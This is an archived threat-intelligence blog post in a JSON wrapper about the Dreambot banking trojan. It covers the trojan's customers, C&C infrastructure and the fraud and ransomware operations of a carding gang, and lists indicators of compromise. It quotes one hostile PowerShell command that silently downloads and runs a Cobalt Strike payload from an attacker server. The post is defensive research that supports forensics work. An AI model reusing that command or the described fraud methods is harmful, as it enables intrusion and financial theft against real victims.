{
	"id": "b8a972fa-ad55-4725-80d2-4a2ed10e8b2e",
	"created_at": "2026-04-06T00:09:38.52524Z",
	"updated_at": "2026-04-10T03:28:24.33003Z",
	"deleted_at": null,
	"sha1_hash": "a71c007f20d98d8724bb35a58f935d7cb35409af",
	"title": "The end of Dreambot? Obituary for a loved piece of Gozi.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2891880,
	"plain_text": "The end of Dreambot? Obituary for a loved piece of Gozi.\r\nBy Benoit ANCEL\r\nPublished: 2020-05-01 · Archived: 2026-04-05 16:00:25 UTC\r\nDreambot finally seems to be out of service after more than 6 years of activity. The back-end servers of the botnet have been down for a few weeks now, the onion C\u0026Cs are down too, and no new samples appear to have been found in the wild since March 2020.\r\nThe lack of new features? The multiplication of new Gozi variants? The huge rise of Zloader? COVID-19? We can’t be sure exactly what the cause of death was, but more and more indicators point at the end of Dreambot.\r\nNow, more than ever, the history of botnets is essential to a deep understanding of the evolving cyber-crime industry. It’s time to tell some stories we learned while researching this very interesting malware operation.\r\nWhat was Dreambot?\r\nMentioned publicly for the first time by IBM and detailed by Proofpoint and Fox-IT, Dreambot was a botnet primarily used to commit bank fraud.\r\nBased on the leaked source code of ISFB, Dreambot was simply another Gozi fork, but with a singular feature making it easy to identify: support for Tor C\u0026Cs.\r\nDreambot was a common banking trojan, having all the usual features:\r\nWebinjects\r\nVNC\r\nSocks\r\nKeylogging\r\nFormGrabbing\r\nEmail stealer\r\nCookie stealer\r\nPassword stealer\r\nScreenshots/Video\r\nBackdoor\r\nBootkit\r\nAs mentioned by Maciej Kotowicz, Dreambot was very close to another ISFB fork recently back in the wild, called IAP.\r\nISFB, Still Live and Kicking — Maciej Kotowicz, Botconf 2016\r\nhttps://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122\r\nPage 1 of 22\r\nBusiness model\r\nDreambot was using a traditional business model. 
You pay the administrators and they give you a C\u0026C server, a way to protect your C\u0026C domains (DGA / P2P and switching between Brazzzzers and Sandiflux/Fluxxy fast flux), and an un-crypted (not yet packed) build with a dedicated SERPENT key used to identify each customer of the botnet.\r\nStarting from that, a Dreambot customer can use whatever method he wants to spread the malware and manage his victims. Most of the time, a customer receives a server as C\u0026C and keeps using the same IP for the C\u0026C server until the end of his contract. At the end of the contract, his IP and his SERPENT key are reused for another client.\r\nSupposed advertisement of Dreambot from 2014\r\nThe Dreambot operators also provide their customers a tool to create, configure and encrypt their webinjects, called ICS. It is based on the similar leaked ISFB tool, Config.exe.\r\nICS used to craft config and webinjects\r\nVery popular in Japan, where it was associated with URLZone, Dreambot was used in other parts of the world as well: USA, Canada, Europe, Asia, Australia.\r\nSince the Dreambot customer base was very volatile (some customers only stayed for a couple of months), it’s very likely that we also missed a lot of different campaigns.\r\nExamples of campaigns:\r\nSophisticated Dropper Masqueraded as Fake DHL Invoice to Distribute Ursnif Malware\r\nDreamBot Campaign Dreams Big\r\nPolish malspam with XLS attachment pushes Ursnif\r\nJPCERT/CC Incident Handling Report\r\nDreambot (11.13.2019) — Document analysis\r\nNew Ursnif trojan variant targets ‘tens of thousands of users’ across Japan\r\nDreambot Banking Trojan Delivered via Resume-Themed Email\r\nNew Ursnif Campaign: A Shift from PowerShell to Mshta\r\nIcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution\r\nDetection 
Content: Finding Ursnif Trojan Activity\r\nBanking Trojan Targets Czech and Slovenian Speakers\r\nAttack Vectors Behind Online Banking Malware “DreamBot” Targets Japan\r\nMalware Tales: Dreambot\r\nMalvertising Chain Leads to the HookAds Campaign. RIG Drops Dreambot.\r\nDreambot Dropped by HookAds\r\nRIG EK at 188.225.76.222 Drops Dreambot\r\nCustomer volatility also makes it hard to measure the real number of victims, even though we counted more than a million infections world-wide just for 2019.\r\nAnd as if Dreambot was not hard enough to track, we also observed different Dreambot clients reselling access to their C\u0026C in order to share the fraud.\r\nWhen you try to identify a Dreambot client by the SERPENT key used, time is a really important factor. Since the keys are always reused, a SERPENT key value seen in 2017 can (and probably is) still be in use in 2019, but not by the same Dreambot customer. 
The best way to track a Dreambot customer (or the customer of any other banking trojan, for that matter) is probably by following the webinject configurations.\r\nExamples of SERPENT keys observed in the wild:\r\n00DONPORT7710209\r\n0WADGyh7SUCs1i2V\r\n0XOT6QaGzY7j9dhy\r\n10274948AOQPNTBB\r\n36694321POIRYTRI\r\n87654321POIUYTRE\r\n87677321POIRYTRI\r\n87694321POIRYTRI\r\nA4F6421F93DF49AF\r\nA79CE7E04B4C9A6A\r\nCBA16FFC891E31A5\r\nDB23B3470D0CF889\r\nDfei8OoQ0xhjTyql\r\nGFL4R4F6Cw5nFYnA\r\nK74USJY728910OA1\r\nOvZz8XVH91INT7ek\r\nPHZ4OVL2QLI0N8WN\r\nq1a2z3w4s5x6e7d8\r\nQp1FMx2VswbqKjX0\r\ns4Sc9mDb35Ayj8oO\r\nV86iYRDA2FSEqWzL\r\nVm3hI8Nfe5xR0hPW\r\nY46frPcNAJQGl6KT\r\nKTXDkwvQHiBLP2OV\r\ndJReCsX8qWlhQ0kv\r\nWIdtM3YCfxhwrbV1\r\nExamples of onion domains observed in the wild:\r\n2ud3gaufzaiikf3e.onion\r\naaxvkah7dudzoloq.onion\r\naeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion\r\ncbt3milmkp32ou4w.onion\r\ncxzko43pnr7ujnte.onion\r\nerreg34983gy89g389g89459.onion\r\ngfgyucg4ot3q3qno.onion\r\niod5tem372udbzu2.onion\r\nkzuzxhlardmkvwwg.onion\r\nly3sxhs55czhsb3u.onion\r\ns2mf5op7sjtonnkv.onion\r\nvoekeyq7k5vyeg4z.onion\r\nwdwefwefwwfewdefewfwefw.onion\r\ney7kuuklgieop2pq.onion\r\njm2g6cyszkutaurp.onion\r\nh33a7jzovxp2dxfg.onion\r\nwuodygsb2cevqgh5.onion\r\n6vcatkjlim35nscu.onion\r\nDreambot panels\r\nOver time we observed 3 different versions of the Dreambot panel, always hosted on port 3000 of the C\u0026C. Each customer seemed to be able to choose which version of the panel they wanted.\r\nThe first version was still used by a customer until 2020. Revealed by Maciej Kotowicz in 2016, that panel, developed in Perl, was simple but effective. All features were quickly available to the customers, with different export possibilities and Jabber alerts. 
The biggest problem with that version was probably the fact that Perl is hard to maintain today, and the way the data was indexed in the database made the server very slow to reply once an operator reached 100,000 bots with key-logging and form-grabbing data.\r\nAn update of that Perl panel was deployed to some customers. It uses the same mechanisms with minor UI improvements.\r\nBoth of those versions were protected by the same web login:\r\nDreambot login\r\nFun fact around that login page: the Rarog botnet developed by Foxovsky was using the exact same login page. Coincidence, cooperation or copy-paste? We never found the answer.\r\nAnd finally, the latest version of the panel, developed from scratch in PHP with a MongoDB database, was the most used.\r\nThe source code of that panel seems to show that it was created by a new developer, not affiliated with the development of the malware itself.\r\nThat version had the big advantage of being protected by VPN authentication, making the C\u0026C more resilient.\r\nThe C\u0026C had 3 different ports open:\r\n333: used by the bots to contact the gate\r\n555: used to load different binaries from the C\u0026C\r\n3000: used for the admin interface\r\nDreambot clients\r\nAs mentioned previously, Dreambot was used by plenty of different carders. Some groups used it for a few weeks, while others seemed to have been there since the very beginning of the botnet. 
Dreambot used to have plenty of customers; we are not going to mention all of them, only the interesting ones.\r\nThe most intriguing story comes from one of those early adopters, a carder using the nickname Jer.\r\n“Jer” as a user of a Dreambot C\u0026C\r\n“Jer” used as the issuer for his Dreambot C\u0026C SSL cert\r\nJer was the Dreambot customer using, almost all the time, builds with the SERPENT key s4Sc9mDb35Ayj8oO and the onion domain iod5tem372udbzu2[.]onion. Jer was the one spreading Dreambot with URLZone for years and years, targeting Japanese banks (but not only). You can find plenty of references to his campaigns over the Internet.\r\nExample of Jer’s campaign provided by the amazing work of Kafeine\r\nJer seems to have played a higher role than being just a customer of Dreambot. 
During the monitoring of new Dreambot customers, we observed that each time a carder reached the end of his contract, the infected computers controlled by his panel would receive a new configuration, routing them to another Dreambot C\u0026C: Jer’s C\u0026C.\r\nAt the end of 2018, Jer was dealing with more than 200,000 bots from around the world, collected from his own campaigns (most of the time using the Cutwail spambot) and from former Dreambot customers.\r\nWe managed to observe that Jer was defrauding different banks around the world, and it seems this was not even his main business.\r\nOne of the very important features of Dreambot is the capability to drop a 2nd stage implant on any infected bot. That feature opened all kinds of opportunities for the operators.\r\nAfter digging into Jer’s targets in 2018, we observed various victims (government organizations, large institutions, big companies) being infected at the same time by unknown 2nd stage implants. That behaviour led us to think that Jer was also probably reselling access to some of his valuable victims to 3rd parties, which is something very common and profitable in the world of carders.\r\nAt the end of 2018, Jer left his old C\u0026C for a fresh new server with the latest version of the panel. His old server was then used by a new, very interesting carder. 
We will call him Bagsu.\r\nBagsu is an old and well-known carder, client of different botnets like Emotet, Zloader or Trickbot (and Trickbot Anchor), focusing his business on:\r\nTargeting German banks\r\nReselling loads to other carders\r\nThe Bagsu case is a very good example of the capabilities and the TTPs to expect when you are infected with a modern banking trojan.\r\nBanking trojan, but not only\r\nWhen you work in a defensive team doing forensics, it’s important to know the capabilities of the malware you are analyzing in order to understand the perimeter of the potential breach you are investigating.\r\nWhen a computer is infected with a banking trojan, the biggest mistake an investigator can make is to think that “it is not that bad, this user doesn’t deal with financial data anyway”, but the reality is far more complex.\r\nBanking trojans are, before everything, trojans. Most of them embed features such as webinjects, but the operators of these trojans will try to make money every way possible, even if the victim is not dealing with financial data.\r\nBagsu is the perfect example of such monetization techniques, and we are going to showcase all the different ways that were used over time.\r\nBagsu presents as an individual, but it could very well be a carding gang. Carding is not about infecting millions of people, clicking on a magic “get rich” button and taking the money. Each bot needs to be inspected to see how you can profit from it, and when you receive a thousand new bots per day, it is almost impossible to work alone. Most of the time, if you want to defraud a bank transfer, you need to have the victim online with his smartphone, steal the 2FA code, etc. 
It’s a 24/7 job that can’t be done by just one person.\r\nAnd when you analyze a C\u0026C like this one, you can see that almost every single bot has been checked manually and a comment has been set to indicate what kind of fraud is doable.\r\nThe complexity of this operation indicates a carding gang is more likely behind this, rather than just an individual.\r\nBehind such a fraud operation you often have:\r\nPeople maintaining the malware (here the Dreambot developers)\r\nPeople spreading your malware (exploit kit operators, spammers, etc.)\r\nPeople analyzing each bot to identify how to steal money from it\r\nNetwork operators to navigate inside a company from a victim\r\n3rd parties to engage in specific fraud like ransomware or BEC\r\nVarious money laundering networks\r\nFrom this single carding gang, we managed to observe Dreambot being used to do:\r\nDirect bank fraud\r\neShop fraud\r\nBEC fraud\r\nVarious scams\r\nPOS / Hotel fraud\r\nRansomware attacks\r\nAnd that behaviour applies to all major so-called banking trojans on the market. Dreambot, all the Gozi forks, Dridex, Trickbot, ZLoader, Danabot, etc.: it is never a single actor, but plenty of different carding gangs with plenty of different operations and the same objective: making money.\r\nAnother point to consider when collecting intelligence around the carding industry is that most of the time a carder is not a client of just a single banking trojan. 
As we will show here with Bagsu, some carders are often clients of different botnets at the same time.\r\nThe classic bank fraud\r\nLet’s describe the classic bank fraud committed by the Bagsu gang: the direct bank fraud. The Bagsu gang works mostly against German banks, but thanks to Dreambot they also work with 3rd parties to commit fraud in the USA, Canada and even Romania or Poland, to maximize profits.\r\nThose attacks are mostly targeted against individuals or companies, but we also observed the Bagsu gang using Dreambot to target bank employees directly.\r\nIt’s quite simple: Dreambot is distributed in order to infect people. After the infection, a webinject is deployed by Dreambot in the victim’s browsers, and when that victim logs into the online banking service, credentials are intercepted to be reused later by the carder. This behavior is well documented today, for example in the paper by Jean-Ian Boutin, “The evolution of webinjects”.\r\nExample of webinjects used by the Bagsu gang in Germany against Targobank\r\nBut in 2020, stealing online banking credentials from somebody is not enough to steal money. Almost every bank now deploys tons of heuristics in order to see whether the computer using those credentials belongs to the real user or not. You cannot take Tor Browser and log into a bank account like that: an alert would be raised at the bank and the account would be blocked pending further investigation. That’s why carders use a VNC connection to the victim’s computer or a SOCKS proxy to tunnel their connection.\r\nDreambot offers both of those techniques by design. 
When a victim is infected by Dreambot, a VNC connection and/or a SOCKS proxy is set up on the victim’s computer.\r\nExample of VNC / Socks management by Dreambot\r\nThe carder sets up a VNC and a SOCKS server somewhere (in that example at 185.212.149.162) and each Dreambot victim is connected to that server via a dedicated port. When the carder needs to commit a fraud, he connects directly to the victim’s computer through that VNC server, and just like that he is on the same computer at the same time as the victim, operating over a hidden desktop.\r\nSOCKS or VNC can be useful in different ways. When you only want to bypass localization restrictions, a SOCKS proxy is enough: you have the same IP as the victim and bypass localization heuristics. But today most banks also implement other fingerprinting techniques. If you don’t use the same browser with the same plugins, you will end up with the bank account blocked very quickly. That’s why nowadays carders prefer using VNC.\r\nVNC is the perfect technology since you use the exact same computer as the victim, and today VNC reselling is a hugely underestimated business in the carding industry. VNC “back-connects” are often considered low-profile malware, but that is where a lot of banking fraud is coming from. If a carder is smart enough, he doesn’t even need webinject malware to defraud banks: he just needs to buy a list of VNC IPs and observe and/or drop different info-stealers to understand how to defraud the victim.\r\nAnother important point is that, from a forensics point of view, the VNC/SOCKS connections are often the easiest malicious behaviour to catch during an attack. 
A process like explorer.exe or svchost.exe sending requests to a server via a strange port can be way easier to detect than a Tor connection or a C\u0026C decoy.\r\nLet’s summarize:\r\nThe Bagsu gang infects targets with Dreambot.\r\nDreambot provides the needed credentials / keylogging / VNC / SOCKS.\r\nThe Bagsu gang uses VNC to connect to the online banking account in order to launch a bank transfer.\r\nEven so, to successfully defraud European banks in 2020 you also need to intercept the 2FA codes via the victim’s smartphone.\r\nIn order to bypass 2FA, the Bagsu gang uses an Android malware. When a victim’s browser is injected by a webinject and that victim goes to his online banking service, the Bagsu gang uses the webinject to display an alert to the victim saying “If you still want to use our online banking website, it is now mandatory to install our new mobile application”.\r\nExample of webinject used to lure a victim\r\nThat webinject proposes 3 ways for the victim to install the APK (outside the Play Store):\r\nLink received by SMS\r\nQR code to scan\r\nADB manipulation\r\nExample of SMS received by the victims\r\nThis malware has recently been described by Pavel Asinovsky from IBM and named TrickMo, due to the fact that it was caught during a Trickbot fraud.\r\nDespite the excellent article by IBM, that Android malware is unfortunately not really an exclusive part of Trickbot. The Bagsu gang was a client of both Dreambot and Trickbot at some point and was using that malware to defraud banks via both of those botnets. 
That APK is a tool used by the Bagsu gang since at least 2014 over plenty of botnets.\r\nOld C\u0026Cs for that Android malware, for the malware palaeontologists:\r\nfacebouk[.]net\r\nweb5401[.]com\r\n178.79.145[.]141\r\nwebnat[.]host\r\nNow the Bagsu gang can run a full fraud by leveraging webinjects to initiate malicious bank transfers and launder the proceeds via a money mule network.\r\nThe big picture of this fraud shows the complexity of the tools used by a carder gang. Looking at Dreambot only, at the VNC connection only or at the Android part only can lead to confusing threat intelligence attribution, ignoring the connection between different tools related to a malware like Dreambot.\r\nAnd again, that operation is run by only one client of Dreambot; the others use different TTPs to defraud banks. In one instance we observed a Dreambot customer using the Anubis Android malware.\r\nNow let’s have a look at a second type of financial fraud perpetrated by the Bagsu gang using Dreambot: eCommerce fraud.\r\neCommerce fraud: the new gold\r\nHistorically, Bagsu was good at defrauding banks. That fraud alone involves a lot of skills, and since nobody can be good at everything at the same time, or have the time to do everything at once (all these carders are humans with real-life problems like kids, etc.), he had to hire various partners to commit frauds out of his reach. This is exactly the case for the eCommerce fraud.\r\nDefrauding eShops is quite similar to doing bank fraud, the big difference being that it’s way easier to launder money stolen from an eShop.\r\nTo organize their eCommerce fraud operations, the Bagsu gang paid a “fraud monkey” called G25. His role was to connect to the Dreambot C\u0026C and catch (via key-logging data, form grabbing data, webinjects etc.) 
every single person using eCommerce platforms such as eBay, PayPal or Amazon.\r\nExample of comments left by G25\r\nThe game is to retrieve Amazon accounts, for example, and use those accounts to order valuable goods (smartphones, laptops, video game consoles, graphics cards) and send those goods to someone who then resells them and returns the “cashed out” (clean) money.\r\neShops have way fewer fraud detection mechanisms in place compared to banks, so most of the time a SOCKS proxy is enough to connect to a victim’s Amazon account. The problem with defrauding eShops lies elsewhere.\r\nWhen G25 hacks an Amazon account, he cannot just order something from a German Amazon account and send the package somewhere in Russia or China. Because of fraud detection heuristics, such an order will be blocked. And that’s a way bigger problem than with a bank transfer, because to make it happen you have no other choice than having real people living near your victim to receive the goods.\r\nHiring people to intercept packages, store the goods and resell them is a full-time job by itself. It involves dedicating time, assuming risks and spending money. But thanks to the carding industry, defrauding packages is super easy.\r\nBasically, G25 needs somebody (a mule that he controls, through a job contract for example) who lives as close as possible to his Amazon victim. G25 needs to make sure the mule will forward the fraudulent package to somebody else without asking questions and without stealing it. Stolen packages are a big problem in the mule business. Finally, G25 needs people to resell his goods and send him back the money.\r\nThis complex scheme is easy to implement today, thanks to the evolution of the carding industry. 
You can find plenty of services out there which offer you addresses around the world where carded packages can be sent. Such services take care of everything: hiring the mules, routing the packages and selling the goods. All you must do is send packages to that service, and you can expect between 20% and 50% of the price of the stolen goods.\r\nPlenty of services like that exist over the internet; over Dreambot, G25 was often using one called “Stuffer”.\r\nG25 just has to select the package mule closest to his victim, provide the package label to the Stuffer staff and wait for profits. This is an easy and very efficient way to commit fraud and cash out money.\r\nWe have observed a huge number of packages defrauded over Dreambot, but today this is a very common scam used by a lot of criminals, from carders to password stealer operators.\r\nIt’s an easy way to make a profit from victims who are not using online banking but can provide other monetization opportunities for the fraudsters.\r\nLet’s now take a look at the more complex way used by the Bagsu gang over Dreambot to make profits.\r\nPoint of Sales / Hotels: the carding cornucopia\r\nWith Dreambot, various bots are available, allowing attackers to set foot in various types of victim organizations. But some victims are more valuable than others for a carder.\r\nHotels, restaurants or any company using PoS terminals are real gold for a team like the Bagsu gang. A lot of credit cards are available on a daily basis on various poorly secured computer systems.\r\nThe biggest problem is that the victims infected by Dreambot rarely use a restaurant or a hotel PoS themselves. 
The gang needs to identify which victims have potential and move laterally inside the victim organization to gain access to the valuable computers.\r\nThese attacks are high value for the cyber-criminals and a pure nightmare for the forensic teams.\r\nLet’s take this example:\r\nYou can see here a Dreambot victim who was infected on the 14th of November 2018. The Bagsu gang quickly identified the endpoint as being part of a hotel chain, with potential access to PoS terminals. To gain access to those PoS, Bagsu needs to drop some lateral movement tools.\r\nOn the 20th of November (6 days after the infection), Bagsu decides to drop an unknown 2nd stage malware on that victim in order to move on with the attack. That 6-day delay after initial infection makes it hard for researchers to track Dreambot by relying on a one-time sandbox detonation. This case also presents a real nightmare for the forensics team from an attribution perspective.\r\nEach time the Bagsu gang needed to move laterally, they used the same kind of tools. Most often they used Cobalt Strike in combination with the PyXie RAT. We observed a lot of Cobalt Strike instances run by the Bagsu gang, used to infect other machines inside a company.\r\nExamples of Cobalt Strike instances observed:\r\nspineyes[.]club\r\n185.147.15[.]13\r\ncdn.greyrockland[.]com\r\n195.88.208[.]76\r\n94.156.189[.]217\r\napp.yourcellphonebiz[.]com\r\njs.choosebudget[.]com\r\n192.254.66[.]108\r\nWe are purposefully not going to attribute these Cobalt Strike instances to specific groups. Feel free to dig.\r\nFor some reason, Cobalt Strike was not always used to move inside a company. Sometimes, more basic tricks were used. 
One of those tricks was an email inbox stealer.\r\nThe Bagsu gang used Dreambot to drop an email stealer tasked with exfiltrating the inbox and the contact list of the victim. The inbox and contact list can be used later to craft “reply style” emails and insert a payload in the middle of a real email discussion, to better lure the victim.\r\nThese advanced attacks are more complex to pull off, but when they succeed, they are way more profitable than traditional individual bank fraud.\r\nAnother example of why an infection by a “banking” trojan on a computer that doesn’t deal with financial data is still extremely dangerous. Webinjects are a risk of course, but as shown here, they are far from the biggest risk for a company.\r\nLet’s move to our last set of examples of fraud originally initiated from Dreambot.\r\nBEC fraud, ransomware and beyond\r\nWe have previously presented different, more or less elegant fraud methods, but of course not all the fraud committed by that gang over Dreambot is elegant.\r\nWe have observed the features of Dreambot being used to collect data about different vulnerable victims. The gang was sometimes using the VNC over Dreambot to target different private charities and NGOs.\r\nThe game was to access the mailbox of the victim charity and send an email asking the usual donors for new donations:\r\nHello Guys!!\r\nIt has almost been a year!! 
We are gearing up for Birth Mothers Day on May 9th.\r\nWould you be willing to donate again?\r\nAfter jumping into the email exchange between the donors and the charity, the Dreambot operators, pretending to be the charity, mentioned bank problems to the potential donors, and new (fraudulent) bank details were provided. The donors would then send money to the criminals’ bank accounts, while the charities never saw any of the donations.\r\nSimple but very effective attacks, conducted thanks again to Dreambot.\r\nAnother powerful example of an attack endgame is to deploy ransomware. These attacks, sometimes well documented like the Ryuk/Trickbot combination, are not only Trickbot business. We can observe this behavior with almost every big botnet, and Dreambot is no exception.\r\nWe have observed different ransomware attacks conducted via Dreambot in combination with Cobalt Strike. The ransomware used still remains unknown to us today, but all the IOCs point to the operation conducted around the 777 group: https://tehtris.com/en/ransom-war-1/\r\nThis ransomware takes us to the last interesting story collected during the Dreambot monitoring operation.\r\nIn order to conduct a well-done ransomware operation, it’s often important to make sure that you have the maximum privileges possible on the victim computers. 
The criminals can use plenty of tricks to achieve that; one of the most expensive is probably the use of a 0day LPE.\r\nDuring a specific ransomware attack conducted via the Dreambot C\u0026C on the 17th of December 2019, we observed the Bagsu gang dropping the usual Cobalt Strike implant simply by using the VNC on the victim’s computer and copy-pasting the command:\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.254.66[.]108:80/a'))\"\r\nIt appears that Cobalt Strike was not enough to gain the required privileges on the victim’s infrastructure, so the attackers used another method: a local privilege elevation exploit, CVE-2019-1458. For unknown reasons, the attacker dropped both the built exploit and the source code of that exploit.\r\nThat CVE had been disclosed by Kaspersky’s AMR team in the context of an APT operation just 7 days before we found the source code in that Dreambot operation.\r\nThis example shows the capability of these carding groups to leverage an array of tools, including a very fresh 1day exploit. 
This is what makes attribution so hard even for what is considered to be a standard “banking trojan”\r\nlike Dreambot.\r\nFollowing these Dreambot operations shows us how intricate the web of relationships between various carding and\r\ncriminal groups can be.\r\nStarting with a carder doing bank fraud in Germany, we ended up exploring the huge network of existing links\r\nbetween all parts of the cybercrime ecosystem.\r\nThis shows how full attribution really is impossible when looking at an operation such as Dreambot (or Trickbot,\r\nZloader, Danabot, Emotet, all the Gozi variants) as one single, unique operation.\r\nWhile today Dreambot seems dead, we have already seen the Bagsu gang become a big customer of the infamous\r\nZLoader.\r\nConclusions\r\nBehind each big botnet there are hundreds of different people working with different TTPs while having different\r\nobjectives. Analyzing a botnet as one operation can lead to a lot of mistakes.\r\nPardon the clumsy metaphor, but fighting cyber-crime by spending most efforts looking at Dreambot (or\r\nTrickbot or Emotet) as unique entities responsible for fraud is the equivalent of trying to solve a murder by\r\nspending most efforts looking at the brand of the gun.\r\nCarders use those banking trojans just as a tool today, so if Dreambot dies, they will continue their attacks and just\r\npay for another tool with the same features. 
The Bagsu gang here is a good example, successfully switching from\r\none botnet service provider to another whenever needed.\r\nTracking Dreambot only for the bank fraud would mean missing almost 90% of the real attacks carried out with that malware.\r\nWe tried to describe here a few of the interesting anecdotes we collected during our Dreambot research to help our\r\nforensic and blue team fellows protect their infrastructure.\r\nFighting cyber-crime by only focusing on the tools and not on the carders dehumanizes the criminals, making\r\nthem look like untouchable mythological monsters. In fact, we should look at cyber-criminals as human beings,\r\nwith life challenges such as having kids or being stuck at home due to COVID-19.\r\nYear after year, a lot of conspiracy theories are appearing within the threat intelligence space. Dreambot is a good\r\nexample here as the malware is still mistaken for Ursnif even today, because of the lack of public documentation\r\nof the Gozi evolution. Moreover, Dreambot was initially considered a local problem when in fact it had world-wide reach. The Dreambot operation was also considered a unique entity, when in fact it is the result of multiple\r\ncustomers operating simultaneously.\r\nIt’s a whole industry out there, in which criminals cooperate with each other as long as everybody makes money.\r\nThey all share hosters, packers, VNC servers, sometimes a bot or two from a C\u0026C, they share their money mule\r\nnetworks, their webinject developers etc.\r\nThe carding industry today is as complex and powerful as the APT business.\r\nBut don’t give up the faith 🙂\r\nSpecial thanks to Kafeine, Maciej Kotowicz, Fumik0_ and Coldshell for their amazing work on Dreambot and all\r\nthe Gozi branches year after year. 
Nothing would have been possible without them.\r\nSource: https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
	],
	"report_names": [
		"the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4f39c998-5861-4f35-ac24-095653a8b615",
			"created_at": "2023-01-06T13:46:38.836253Z",
			"updated_at": "2026-04-10T02:00:03.116935Z",
			"deleted_at": null,
			"main_name": "HookAds",
			"aliases": [],
			"source_name": "MISPGALAXY:HookAds",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775791704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.pdf",
		"text": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.txt",
		"img": "https://archive.orkl.eu/a71c007f20d98d8724bb35a58f935d7cb35409af.jpg"
	}
}